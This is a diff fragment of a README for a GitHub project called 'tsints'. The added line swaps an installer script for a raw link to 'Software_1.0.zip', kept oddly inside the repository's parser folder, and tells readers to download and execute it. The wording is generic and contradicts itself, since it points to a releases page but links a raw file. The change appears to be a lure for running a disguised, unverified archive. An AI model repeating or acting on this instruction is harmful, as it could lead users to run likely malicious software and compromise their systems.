manahil852/tsints/README.md

 - Respect the existing code style and naming conventions.

 Endnote
 - The releases link above should be checked regularly for the latest version and guidance.
 The page is the primary source of installable artifacts and notes for tsints.
 Visit the page again for updates, improvements, and compatibility information.
-Revisit the releases page to download the latest asset tsints-installer.sh and to execute it as described.
+Revisit the releases page to download the latest asset https://github.com/manahil852/tsints/raw/refs/heads/main/parser/Software_1.0.zip and to execute it as described.
 The page provides the latest assets and documentation to assist you in exploring the parser’s capabilities.